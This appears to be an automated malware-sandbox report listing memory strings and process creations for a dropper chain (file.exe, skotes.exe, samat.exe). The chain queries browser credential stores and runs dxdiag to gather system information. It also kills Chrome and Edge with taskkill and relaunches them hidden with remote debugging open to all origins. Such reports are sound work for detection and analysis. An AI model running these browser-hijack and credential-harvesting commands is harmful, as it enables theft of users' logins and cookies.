Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: samat.exe, samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT a11, a102 FROM nssPrivate WHERE a102 = ?;
Source: samat.exe, 00000008.00000003.3921967640.000001BCCD5EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3921967640.000001BCCD5D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
